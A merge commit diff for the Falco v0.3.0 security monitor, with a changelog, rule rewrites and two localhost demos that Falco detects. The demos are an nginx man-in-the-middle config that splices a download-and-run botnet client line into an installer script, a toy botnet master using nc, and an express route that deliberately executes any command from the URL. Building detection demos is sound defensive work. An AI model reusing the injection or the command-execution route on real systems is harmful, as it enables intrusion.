Merge pull request #109 from draios/dev

Merging for 0.3.0
Mark Stemm 2016-08-05 12:35:31 -07:00 committed by GitHub
commit b6f08cc403
34 changed files with 1763 additions and 156 deletions


@ -36,7 +36,7 @@ script:
- make VERBOSE=1
- make package
- cd ..
- sudo test/run_regression_tests.sh $TRAVIS_BRANCH
notifications:
  webhooks:
    urls:


@ -2,6 +2,68 @@
This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
## v0.3.0
Released 2016-08-05
### Major Changes
Significantly improved performance, involving changes in the falco and sysdig repositories:
* Reordering a rule condition's operators to put likely-to-fail operators at the beginning and expensive operators at the end. [[#95](https://github.com/draios/falco/pull/95/)] [[#104](https://github.com/draios/falco/pull/104/)]
* Adding the ability to perform `x in (a, b, c, ...)` as a single set membership test instead of individual comparisons against x=a, x=b, etc. [[#624](https://github.com/draios/sysdig/pull/624)] [[#98](https://github.com/draios/falco/pull/98/)]
* Avoiding unnecessary string manipulations. [[#625](https://github.com/draios/sysdig/pull/625)]
* Using `startswith` as a string comparison operator when possible. [[#623](https://github.com/draios/sysdig/pull/623)]
* Using `is_open_read`/`is_open_write` when possible instead of searching through open flags. [[#610](https://github.com/draios/sysdig/pull/610)]
* Grouping rules by event type, which allows an initial filter on event type before evaluating each rule's condition. [[#627](https://github.com/draios/sysdig/pull/627)] [[#101](https://github.com/draios/falco/pull/101/)]
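As an illustration, a condition that compares the same field repeatedly can be collapsed into one set membership test (a hypothetical macro, not one from the shipped ruleset):

```yaml
# Before: three separate comparisons, each evaluated in turn.
- macro: package_mgmt_procs_slow
  condition: proc.name=dpkg or proc.name=rpm or proc.name=yum

# After: a single set membership test.
- macro: package_mgmt_procs_fast
  condition: proc.name in (dpkg, rpm, yum)
```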
All of these changes result in dramatically reduced CPU usage. Here are some comparisons between 0.2.0 and 0.3.0 for the following workloads:
* [Phoronix](http://www.phoronix-test-suite.com/)'s `pts/apache` and `pts/dbench` tests.
* Sysdig Cloud Kubernetes Demo: starts a kubernetes environment using docker, with apache and wordpress instances plus synthetic workloads.
* [Juttle-engine examples](https://github.com/juttle/juttle-engine/blob/master/examples/README.md): several elasticsearch, node.js, logstash, mysql, postgres, and influxdb instances run under docker-compose.
| Workload | 0.2.0 CPU Usage | 0.3.0 CPU Usage |
|----------| --------------- | ----------------|
| pts/apache | 24% | 7% |
| pts/dbench | 70% | 5% |
| Kubernetes-Demo (Running) | 6% | 2% |
| Kubernetes-Demo (During Teardown) | 15% | 3% |
| Juttle-examples | 3% | 1% |
As a part of these changes, falco now prefers rule conditions that have at least one `evt.type=` operator at the beginning of the condition, before any negative operators (i.e. `not` or `!=`). If a condition does not have any `evt.type=` operator, falco will log a warning like:
```
Rule no_evttype: warning (no-evttype):
proc.name=foo
did not contain any evt.type restriction, meaning it will run for all event types.
This has a significant performance penalty. Consider adding an evt.type restriction if possible.
```
If a rule has an `evt.type` operator later in the condition, falco will log a warning like:
```
Rule evttype_not_equals: warning (trailing-evttype):
evt.type!=execve
does not have all evt.type restrictions at the beginning of the condition,
or uses a negative match (i.e. "not"/"!=") for some evt.type restriction.
This has a performance penalty, as the rule can not be limited to specific event types.
Consider moving all evt.type restrictions to the beginning of the rule and/or
replacing negative matches with positive matches if possible.
```
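For example, a condition shaped like the following avoids both warnings by leading with positive `evt.type` checks (a hypothetical rule, using the same fields as the shipped macros):

```yaml
- rule: write_below_tmp
  desc: hypothetical example; all evt.type restrictions lead the condition
  condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.name startswith /tmp
  output: "File below /tmp opened for writing (user=%user.name command=%proc.cmdline file=%fd.name)"
  priority: WARNING
```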
### Minor Changes
* Several sets of rule cleanups to reduce false positives. [[#95](https://github.com/draios/falco/pull/95/)]
* Add example of how falco can detect abuse of a badly designed REST API. [[#97](https://github.com/draios/falco/pull/97/)]
* Add a new output type "program" that writes a formatted event to a configurable program. Each notification results in one invocation of the program. A common use of this output type would be to send an email for every falco notification. [[#105](https://github.com/draios/falco/pull/105/)] [[#99](https://github.com/draios/falco/issues/99)]
* Add the ability to run falco on all events, including events that are flagged with `EF_DROP_FALCO`. (These events are high-volume, low-value events that are ignored by default to improve performance). [[#107](https://github.com/draios/falco/pull/107/)] [[#102](https://github.com/draios/falco/issues/102)]
### Bug Fixes
* Add third-party jq library now that sysdig requires it. [[#96](https://github.com/draios/falco/pull/96/)]
## v0.2.0
Released 2016-06-09


@ -58,6 +58,18 @@ ExternalProject_Add(zlib
    BUILD_IN_SOURCE 1
    INSTALL_COMMAND "")

set(JQ_SRC "${PROJECT_BINARY_DIR}/jq-prefix/src/jq")
message(STATUS "Using bundled jq in '${JQ_SRC}'")
set(JQ_INCLUDE "${JQ_SRC}")
set(JQ_LIB "${JQ_SRC}/.libs/libjq.a")
ExternalProject_Add(jq
    URL "http://download.draios.com/dependencies/jq-1.5.tar.gz"
    URL_MD5 "0933532b086bd8b6a41c1b162b1731f9"
    CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
    BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
    BUILD_IN_SOURCE 1
    INSTALL_COMMAND "")
set(JSONCPP_SRC "${SYSDIG_DIR}/userspace/libsinsp/third-party/jsoncpp")
set(JSONCPP_INCLUDE "${JSONCPP_SRC}")
set(JSONCPP_LIB_SRC "${JSONCPP_SRC}/jsoncpp.cpp")
@ -103,6 +115,7 @@ ExternalProject_Add(yamlcpp
set(OPENSSL_BUNDLE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl")
set(OPENSSL_INSTALL_DIR "${OPENSSL_BUNDLE_DIR}/target")
set(OPENSSL_INCLUDE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl/include")
set(OPENSSL_LIBRARY_SSL "${OPENSSL_INSTALL_DIR}/lib/libssl.a")
set(OPENSSL_LIBRARY_CRYPTO "${OPENSSL_INSTALL_DIR}/lib/libcrypto.a")


@ -2,7 +2,7 @@
#### Latest release
**v0.3.0**
Read the [change log](https://github.com/draios/falco/blob/dev/CHANGELOG.md)

Dev Branch: [![Build Status](https://travis-ci.org/draios/falco.svg?branch=dev)](https://travis-ci.org/draios/falco)<br />
@ -21,12 +21,6 @@ Falco can detect and alert on any behavior that involves making Linux system cal
- A non-device file is written to `/dev`
- A standard system binary (like `ls`) makes an outbound network connection

Documentation
---
[Visit the wiki](https://github.com/draios/falco/wiki) for full documentation on falco.


@ -0,0 +1,78 @@
# Demo of falco with man-in-the-middle attacks on installation scripts
For context, see the corresponding [blog post](http://sysdig.com/blog/making-curl-to-bash-safer) for this demo.
## Demo architecture
### Initial setup
Make sure no prior `botnet_client.py` processes are lying around.
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* apache: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
* nginx: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
* evil_apache: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
* attacker_botnet_master: constantly trying to contact the botnet_client.py process.
* falco: will detect the activities of botnet_client.py.
### Download `install-software.sh`, see botnet client running
Run the following to fetch and execute the installation script,
which also installs the botnet client:
```
$ curl http://localhost/install-software.sh | bash
```
You'll see messages about installing the software. (The script doesn't actually install anything; the messages are just for demonstration purposes.)
Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
```
$ ps auxww | grep python
...
root 19983 0.1 0.4 33992 8832 pts/1 S 13:34 0:00 python ./botnet_client.py
$ telnet localhost 1234
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
```
You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
```
attacker_botnet_master | Trying to contact compromised machine...
attacker_botnet_master | Waiting for botnet command and control commands...
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
```
At this point, kill the botnet_client.py process to clean things up.
### Run the installation script again using `fbash`, note falco warnings
If you run the installation script again, this time piping it to `fbash`:
```
curl http://localhost/install-software.sh | ./fbash
```
In the docker-compose output, you'll see the following falco warnings:
```
falco | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
```


@ -0,0 +1,7 @@
#!/bin/sh
while true; do
    echo "Trying to contact compromised machine..."
    echo "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec" | nc localhost 1234 && echo "**********Contacted compromised machine, sent botnet commands"
    sleep 5
done


@ -0,0 +1,51 @@
# Owned by software vendor, serving install-software.sh.
apache:
  container_name: apache
  image: httpd:2.4
  volumes:
  - ${PWD}/web_root:/usr/local/apache2/htdocs

# Owned by software vendor, compromised by attacker.
nginx:
  container_name: mitm_nginx
  image: nginx:latest
  links:
  - apache
  ports:
  - "80:80"
  volumes:
  - ${PWD}/nginx.conf:/etc/nginx/nginx.conf:ro

# Owned by attacker.
evil_apache:
  container_name: evil_apache
  image: httpd:2.4
  volumes:
  - ${PWD}/evil_web_root:/usr/local/apache2/htdocs
  ports:
  - "9090:80"

# Owned by attacker, constantly trying to contact client.
attacker_botnet_master:
  container_name: attacker_botnet_master
  image: alpine:latest
  net: host
  volumes:
  - ${PWD}/botnet_master.sh:/tmp/botnet_master.sh
  command:
  - /tmp/botnet_master.sh

# Owned by client, detects attack by attacker
falco:
  container_name: falco
  image: sysdig/falco:latest
  privileged: true
  volumes:
  - /var/run/docker.sock:/host/var/run/docker.sock
  - /dev:/host/dev
  - /proc:/host/proc:ro
  - /boot:/host/boot:ro
  - /lib/modules:/host/lib/modules:ro
  - /usr:/host/usr:ro
  - ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
  tty: true


@ -0,0 +1,18 @@
import socket
import signal
import os

os.close(0)
os.close(1)
os.close(2)

signal.signal(signal.SIGINT, signal.SIG_IGN)

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('0.0.0.0', 1234))
serversocket.listen(5)

while 1:
    (clientsocket, address) = serversocket.accept()
    clientsocket.send('Waiting for botnet command and control commands...\n')
    command = clientsocket.recv(1024)
    clientsocket.send('Ok, will execute "{}"\n'.format(command.strip()))
    clientsocket.close()


@ -0,0 +1,15 @@
#!/bin/bash

SID=`ps --no-heading -o sess --pid $$`

if [ $SID -ne $$ ]; then
    # Not currently a session leader? Run a copy of ourself in a new
    # session, with copies of stdin/stdout/stderr.
    setsid $0 $@ < /dev/stdin 1> /dev/stdout 2> /dev/stderr &
    FBASH=$!
    trap "kill $FBASH; exit" SIGINT SIGTERM
    wait $FBASH
else
    # Just evaluate the commands (from stdin)
    source /dev/stdin
fi
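The session-leader test that drives `fbash` can be sketched in Python (an illustration of the mechanism, not part of the demo): a process is a session leader exactly when its session id equals its pid, and `setsid` (here `start_new_session=True`) puts the child in a fresh session of its own.

```python
import os
import subprocess
import sys

# A process is a session leader iff its session id equals its pid;
# fbash compares the output of `ps -o sess --pid $$` against $$ for this.
def is_session_leader():
    return os.getsid(0) == os.getpid()

# Launching a child with start_new_session=True is the setsid step:
# the child becomes the leader of a brand-new session.
child = subprocess.run(
    [sys.executable, "-c",
     "import os; print(os.getsid(0) == os.getpid())"],
    capture_output=True, text=True, start_new_session=True,
)
print(child.stdout.strip())
```

Because every command sourced by `fbash` inherits that new session, falco can use `proc.sname=fbash` to tell "ran inside a pipe installer session" apart from ordinary shells.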


@ -0,0 +1,12 @@
http {
    server {
        location / {
            sub_filter_types '*';
            sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
            sub_filter_once off;
            proxy_pass http://apache:80;
        }
    }
}

events {
}
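What the `sub_filter` directive does here amounts to a plain substring replacement on the proxied response body; a minimal Python sketch of the same rewrite (the needle and payload strings are taken from the config above):

```python
# nginx's sub_filter replaces each occurrence of the needle in the
# response body; sub_filter_once off makes it global, like str.replace.
NEEDLE = "function install_deb {"
PAYLOAD = ("curl -so ./botnet_client.py http://localhost:9090/botnet_client.py"
           " && python ./botnet_client.py &\n" + NEEDLE)

def mitm_rewrite(body):
    """Return the body with the botnet download spliced in before install_deb."""
    return body.replace(NEEDLE, PAYLOAD)

script = "set -e\nfunction install_deb {\n    echo installing\n}\n"
print(mitm_rewrite(script))
```

Appending the original needle to the payload is what keeps the tampered script syntactically valid, so the victim sees a normal-looking install.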


@ -0,0 +1,156 @@
#!/bin/bash
#
# Copyright (C) 2013-2014 My Company inc.
#
# This file is part of my-software
#
# my-software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# my-software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with my-software. If not, see <http://www.gnu.org/licenses/>.
#
set -e
function install_rpm {
    if ! hash curl > /dev/null 2>&1; then
        echo "* Installing curl"
        yum -q -y install curl
    fi

    echo "*** Installing my-software public key"
    # A rpm --import command would normally be here
    echo "*** Installing my-software repository"
    # A curl path-to.repo <some url> would normally be here
    echo "*** Installing my-software"
    # A yum -q -y install my-software command would normally be here
    echo "*** my-software Installed!"
}

function install_deb {
    export DEBIAN_FRONTEND=noninteractive
    if ! hash curl > /dev/null 2>&1; then
        echo "* Installing curl"
        apt-get -qq -y install curl < /dev/null
    fi

    echo "*** Installing my-software public key"
    # A curl <url> | apt-key add - command would normally be here
    echo "*** Installing my-software repository"
    # A curl path-to.list <some url> would normally be here
    echo "*** Installing my-software"
    # An apt-get -qq -y install my-software command would normally be here
    echo "*** my-software Installed!"
}

function unsupported {
    echo 'Unsupported operating system. Please consider writing to the mailing list at'
    echo 'https://groups.google.com/forum/#!forum/my-software or trying the manual'
    echo 'installation.'
    exit 1
}
if [ $(id -u) != 0 ]; then
    echo "Installer must be run as root (or with sudo)."
    # exit 1
fi

echo "* Detecting operating system"

ARCH=$(uname -m)
if [[ ! $ARCH = *86 ]] && [ ! $ARCH = "x86_64" ]; then
    unsupported
fi
if [ -f /etc/debian_version ]; then
    if [ -f /etc/lsb-release ]; then
        . /etc/lsb-release
        DISTRO=$DISTRIB_ID
        VERSION=${DISTRIB_RELEASE%%.*}
    else
        DISTRO="Debian"
        VERSION=$(cat /etc/debian_version | cut -d'.' -f1)
    fi

    case "$DISTRO" in
        "Ubuntu")
            if [ $VERSION -ge 10 ]; then
                install_deb
            else
                unsupported
            fi
            ;;
        "LinuxMint")
            if [ $VERSION -ge 9 ]; then
                install_deb
            else
                unsupported
            fi
            ;;
        "Debian")
            if [ $VERSION -ge 6 ]; then
                install_deb
            elif [[ $VERSION == *sid* ]]; then
                install_deb
            else
                unsupported
            fi
            ;;
        *)
            unsupported
            ;;
    esac
elif [ -f /etc/system-release-cpe ]; then
    DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f3)
    VERSION=$(cat /etc/system-release-cpe | cut -d':' -f5 | cut -d'.' -f1 | sed 's/[^0-9]*//g')

    case "$DISTRO" in
        "oracle" | "centos" | "redhat")
            if [ $VERSION -ge 6 ]; then
                install_rpm
            else
                unsupported
            fi
            ;;
        "amazon")
            install_rpm
            ;;
        "fedoraproject")
            if [ $VERSION -ge 13 ]; then
                install_rpm
            else
                unsupported
            fi
            ;;
        *)
            unsupported
            ;;
    esac
else
    unsupported
fi


@ -0,0 +1,66 @@
# Demo of falco with bash exec via a poorly designed REST API
## Introduction
This example shows how a server could have a poorly designed API that
allows a client to execute arbitrary programs on the server, and how
that behavior can be detected using Sysdig Falco.
`server.js` in this directory defines the server. The poorly designed
API is this route handler:
```javascript
router.get('/exec/:cmd', function(req, res) {
var output = child_process.execSync(req.params.cmd);
res.send(output);
});
app.use('/api', router);
```
It blindly takes the URL portion after `/api/exec/` and tries to
execute it. A horrible design choice(!), but one that lets us easily show
Sysdig falco's capabilities.
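A safer shape for such an endpoint validates input against an allowlist before executing anything. A minimal sketch, written here in Python rather than the demo's node.js, with the `ALLOWED` set invented for illustration:

```python
import shlex
import subprocess

# Hypothetical allowlist: only harmless, argument-free commands.
ALLOWED = {"ls", "pwd"}

def run_cmd(cmd):
    """Run cmd only if it is a single allowlisted word; never pass it to a shell."""
    parts = shlex.split(cmd)
    if len(parts) != 1 or parts[0] not in ALLOWED:
        raise ValueError("command not allowed: %r" % cmd)
    return subprocess.run(parts, capture_output=True, text=True).stdout

print(run_cmd("pwd").strip())
```

Even with an allowlist, detection-side monitoring like falco's remains useful: it catches the cases the allowlist designer did not anticipate.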
## Demo architecture
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* express_server: simple express server exposing a REST API under the endpoint `/api/exec/<cmd>`.
* falco: will detect when you execute a shell via the express server.
### Access URLs under `/api/exec/<cmd>` to run arbitrary commands
Run the following commands to execute arbitrary commands like `ls`, `pwd`, etc.:
```
$ curl http://localhost:8080/api/exec/ls
demo.yml
node_modules
package.json
README.md
server.js
```
```
$ curl http://localhost:8080/api/exec/pwd
.../examples/nodejs-bad-rest-api
```
### Try to run bash via `/api/exec/bash`, falco sends an alert
If you try to run bash via `/api/exec/bash`, falco will generate an alert:
```
falco | 22:26:53.536628076: Warning Shell spawned in a container other than entrypoint (user=root container_id=6f339b8aeb0a container_name=express_server shell=bash parent=sh cmdline=bash )
```


@ -0,0 +1,24 @@
# Simple express server exposing the /api/exec endpoint.
express_server:
  container_name: express_server
  image: node:latest
  working_dir: /usr/src/app
  command: bash -c "npm install && node server.js"
  ports:
  - "8080:8080"
  volumes:
  - ${PWD}:/usr/src/app

falco:
  container_name: falco
  image: sysdig/falco:latest
  privileged: true
  volumes:
  - /var/run/docker.sock:/host/var/run/docker.sock
  - /dev:/host/dev
  - /proc:/host/proc:ro
  - /boot:/host/boot:ro
  - /lib/modules:/host/lib/modules:ro
  - /usr:/host/usr:ro
  - ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
  tty: true


@ -0,0 +1,7 @@
{
  "name": "bad-rest-api",
  "main": "server.js",
  "dependencies": {
    "express": "~4.0.0"
  }
}


@ -0,0 +1,25 @@
var express = require('express');             // call express
var app = express();                          // define our app using express
var child_process = require('child_process');
var port = process.env.PORT || 8080;          // set our port

// ROUTES FOR OUR API
// =============================================================================
var router = express.Router();                // get an instance of the express Router

// test route to make sure everything is working (accessed at GET http://localhost:8080/api)
router.get('/', function(req, res) {
    res.json({ message: 'API available'});
});

router.get('/exec/:cmd', function(req, res) {
    var output = child_process.execSync(req.params.cmd);
    res.send(output);
});

app.use('/api', router);
app.listen(port);
console.log('Server running on port: ' + port);


@ -23,3 +23,6 @@ file_output:
stdout_output:
  enabled: true

program_output:
  enabled: false
  program: mail -s "Falco Notification" someone@example.com


@ -14,26 +14,17 @@
# condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))

- macro: open_write
  condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f'

- macro: open_read
  condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f'

- macro: rename
  condition: evt.type = rename
- macro: mkdir
  condition: evt.type = mkdir
- macro: remove
  condition: evt.type in (rmdir, unlink, unlinkat)

- macro: modify
  condition: rename or remove
@ -43,105 +34,106 @@
# File categories
- macro: terminal_file_fd
  condition: fd.name=/dev/ptmx or fd.name startswith /dev/pts

- macro: bin_dir
  condition: fd.directory in (/bin, /sbin, /usr/bin, /usr/sbin)

- macro: bin_dir_mkdir
  condition: evt.arg[0] startswith /bin/ or evt.arg[0] startswith /sbin/ or evt.arg[0] startswith /usr/bin/ or evt.arg[0] startswith /usr/sbin/
- macro: bin_dir_rename
  condition: evt.arg[1] startswith /bin/ or evt.arg[1] startswith /sbin/ or evt.arg[1] startswith /usr/bin/ or evt.arg[1] startswith /usr/sbin/

- macro: etc_dir
  condition: fd.name startswith /etc

- macro: ubuntu_so_dirs
  condition: fd.name startswith /lib/x86_64-linux-gnu or fd.name startswith /usr/lib/x86_64-linux-gnu or fd.name startswith /usr/lib/sudo
- macro: centos_so_dirs
  condition: fd.name startswith /lib64 or fd.name startswith /usr/lib64 or fd.name startswith /usr/libexec
- macro: linux_so_dirs
  condition: ubuntu_so_dirs or centos_so_dirs or fd.name=/etc/ld.so.cache

- list: coreutils_binaries
  items: [
    truncate, sha1sum, numfmt, fmt, fold, uniq, cut, who,
    groups, csplit, sort, expand, printf, printenv, unlink, tee, chcon, stat,
    basename, split, nice, "yes", whoami, sha224sum, hostid, users, stdbuf,
    base64, unexpand, cksum, od, paste, nproc, pathchk, sha256sum, wc, test,
    comm, arch, du, factor, sha512sum, md5sum, tr, runcon, env, dirname,
    tsort, join, shuf, install, logname, pinky, nohup, expr, pr, tty, timeout,
    tail, "[", seq, sha384sum, nl, head, id, mkfifo, sum, dircolors, ptx, shred,
    tac, link, chroot, vdir, chown, touch, ls, dd, uname, "true", pwd, date,
    chgrp, chmod, mktemp, cat, mknod, sync, ln, "false", rm, mv, cp, echo,
    readlink, sleep, stty, mkdir, df, dir, rmdir, touch
    ]

# dpkg -L login | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" ","
- list: login_binaries
  items: [login, systemd-logind, su, nologin, faillog, lastlog, newgrp, sg]

# dpkg -L passwd | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" ","
- list: passwd_binaries
  items: [
    shadowconfig, grpck, pwunconv, grpconv, pwck,
    groupmod, vipw, pwconv, useradd, newusers, cppw, chpasswd, usermod,
    groupadd, groupdel, grpunconv, chgpasswd, userdel, chage, chsh,
    gpasswd, chfn, expiry, passwd, vigr, cpgr
    ]

# repoquery -l shadow-utils | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" ","
- list: shadowutils_binaries
  items: [
    chage, gpasswd, lastlog, newgrp, sg, adduser, deluser, chpasswd,
    groupadd, groupdel, addgroup, delgroup, groupmems, groupmod, grpck, grpconv, grpunconv,
    newusers, pwck, pwconv, pwunconv, useradd, userdel, usermod, vigr, vipw, unix_chkpwd
    ]

- list: sysdigcloud_binaries
  items: [setup-backend, dragent]
- list: docker_binaries
  items: [docker, exe]
- list: http_server_binaries
  items: [nginx, httpd, httpd-foregroun, lighttpd]
- list: db_server_binaries
  items: [mysqld]
- macro: server_procs
  condition: proc.name in (http_server_binaries, db_server_binaries, docker_binaries, sshd)

# The truncated dpkg-preconfigu is intentional, process names are
# truncated at the sysdig level.
- list: package_mgmt_binaries
  items: [dpkg, dpkg-preconfigu, rpm, rpmkey, yum, frontend]
- macro: package_mgmt_procs
  condition: proc.name in (package_mgmt_binaries)

- list: ssl_mgmt_binaries
  items: [ca-certificates]

- list: dhcp_binaries
  items: [dhclient, dhclient-script]

# A canonical set of processes that run other programs with different
# privileges or as a different user.
- list: userexec_binaries
  items: [sudo, su]

- list: user_mgmt_binaries
  items: [login_binaries, passwd_binaries, shadowutils_binaries]

- macro: system_procs
  condition: proc.name in (coreutils_binaries, user_mgmt_binaries)

- list: mail_binaries
  items: [sendmail, sendmail-msp, postfix, procmail, exim4]

- macro: sensitive_files
  condition: fd.name startswith /etc and (fd.name in (/etc/shadow, /etc/sudoers, /etc/pam.conf) or fd.directory in (/etc/sudoers.d, /etc/pam.d))

# Indicates that the process is new. Currently detected using time
# since process was started, using a threshold of 5 seconds.
@ -150,11 +142,11 @@
# Network
- macro: inbound
  condition: ((evt.type=listen and evt.dir=>) or (evt.type=accept and evt.dir=<))

# Currently sendto is an ignored syscall, otherwise this could also check for (evt.type=sendto and evt.dir=>)
- macro: outbound
  condition: evt.type=connect and evt.dir=< and (fd.typechar=4 or fd.typechar=6)

- macro: ssh_port
  condition: fd.lport=22
@ -165,17 +157,15 @@
# System
- macro: modules
  condition: evt.type in (delete_module, init_module)
- macro: container
  condition: container.id != host
- macro: interactive
  condition: ((proc.aname=sshd and proc.name != sshd) or proc.name=systemd-logind)
- macro: syslog
  condition: fd.name in (/dev/log, /run/systemd/journal/syslog)
- list: cron_binaries
  items: [cron, crond]

# System users that should never log into a system. Consider adding your own
# service users (e.g. 'apache' or 'mysqld') here.
@@ -189,57 +179,64 @@
 - rule: write_binary_dir
   desc: an attempt to write to any file below a set of binary directories
-  condition: evt.dir = < and open_write and not package_mgmt_binaries and bin_dir
+  condition: bin_dir and evt.dir = < and open_write and not package_mgmt_procs
   output: "File below a known binary directory opened for writing (user=%user.name command=%proc.cmdline file=%fd.name)"
   priority: WARNING
+- macro: write_etc_common
+  condition: >
+    etc_dir and evt.dir = < and open_write
+    and not proc.name in (shadowutils_binaries, sysdigcloud_binaries, package_mgmt_binaries, ssl_mgmt_binaries, dhcp_binaries, ldconfig.real)
+    and not proc.pname in (sysdigcloud_binaries)
+    and not fd.directory in (/etc/cassandra, /etc/ssl/certs/java)
 - rule: write_etc
   desc: an attempt to write to any file below /etc, not in a pipe installer session
-  condition: evt.dir = < and open_write and not shadowutils_binaries and not sysdigcloud_binaries_parent and not package_mgmt_binaries and etc_dir and not proc.sname=fbash
+  condition: write_etc_common and not proc.sname=fbash
   output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name)"
   priority: WARNING
 # Within a fbash session, the severity is lowered to INFO
 - rule: write_etc_installer
   desc: an attempt to write to any file below /etc, in a pipe installer session
-  condition: evt.dir = < and open_write and not shadowutils_binaries and not sysdigcloud_binaries_parent and not package_mgmt_binaries and etc_dir and proc.sname=fbash
+  condition: write_etc_common and proc.sname=fbash
   output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name) within pipe installer session"
   priority: INFO
 - rule: read_sensitive_file_untrusted
   desc: an attempt to read any sensitive file (e.g. files containing user/password/authentication information). Exceptions are made for known trusted programs.
-  condition: open_read and not user_mgmt_binaries and not userexec_binaries and not proc.name in (iptables, ps, lsb_release, check-new-relea, dumpe2fs, accounts-daemon, bash, sshd) and not cron and sensitive_files
+  condition: sensitive_files and open_read and not proc.name in (user_mgmt_binaries, userexec_binaries, package_mgmt_binaries, cron_binaries, iptables, ps, lsb_release, check-new-relea, dumpe2fs, accounts-daemon, bash, sshd) and not proc.cmdline contains /usr/bin/mandb
   output: "Sensitive file opened for reading by non-trusted program (user=%user.name command=%proc.cmdline file=%fd.name)"
   priority: WARNING
 - rule: read_sensitive_file_trusted_after_startup
   desc: an attempt to read any sensitive file (e.g. files containing user/password/authentication information) by a trusted program after startup. Trusted programs might read these files at startup to load initial state, but not afterwards.
-  condition: open_read and server_binaries and not proc_is_new and sensitive_files and proc.name!="sshd"
+  condition: sensitive_files and open_read and server_procs and not proc_is_new and proc.name!="sshd"
   output: "Sensitive file opened for reading by trusted program after startup (user=%user.name command=%proc.cmdline file=%fd.name)"
   priority: WARNING
 # Only let rpm-related programs write to the rpm database
 - rule: write_rpm_database
   desc: an attempt to write to the rpm database by any non-rpm related program
-  condition: open_write and not proc.name in (rpm,rpmkey,yum) and fd.directory=/var/lib/rpm
+  condition: fd.name startswith /var/lib/rpm and open_write and not proc.name in (rpm,rpmkey,yum)
   output: "Rpm database opened for writing by a non-rpm program (command=%proc.cmdline file=%fd.name)"
   priority: WARNING
 - rule: db_program_spawned_process
   desc: a database-server related program spawned a new process other than itself. This shouldn\'t occur and is a follow on from some SQL injection attacks.
-  condition: db_server_binaries_parent and not db_server_binaries and spawned_process
+  condition: proc.pname in (db_server_binaries) and spawned_process and not proc.name in (db_server_binaries)
   output: "Database-related program spawned process other than itself (user=%user.name program=%proc.cmdline parent=%proc.pname)"
   priority: WARNING
 - rule: modify_binary_dirs
   desc: an attempt to modify any file below a set of binary directories.
-  condition: modify and bin_dir_rename and not package_mgmt_binaries
+  condition: bin_dir_rename and modify and not package_mgmt_procs
   output: "File below known binary directory renamed/removed (user=%user.name command=%proc.cmdline operation=%evt.type file=%fd.name %evt.args)"
   priority: WARNING
 - rule: mkdir_binary_dirs
   desc: an attempt to create a directory below a set of binary directories.
-  condition: mkdir and bin_dir_mkdir and not package_mgmt_binaries
+  condition: mkdir and bin_dir_mkdir and not package_mgmt_procs
   output: "Directory below known binary directory created (user=%user.name command=%proc.cmdline directory=%evt.arg.path)"
   priority: WARNING
@@ -261,13 +258,13 @@
 - rule: change_thread_namespace
   desc: an attempt to change a program/thread\'s namespace (commonly done as a part of creating a container) by calling setns.
-  condition: syscall.type = setns and not proc.name in (docker, sysdig, dragent)
+  condition: evt.type = setns and not proc.name in (docker, sysdig, dragent, nsenter, exe)
   output: "Namespace change (setns) by unexpected program (user=%user.name command=%proc.cmdline container=%container.id)"
   priority: WARNING
 - rule: run_shell_untrusted
   desc: an attempt to spawn a shell by a non-shell program. Exceptions are made for trusted binaries.
-  condition: not container and proc.name = bash and spawned_process and proc.pname exists and not parent_cron and not proc.pname in (bash, sshd, sudo, docker, su, tmux, screen, emacs, systemd, login, flock, fbash, nginx, monit, supervisord, dragent)
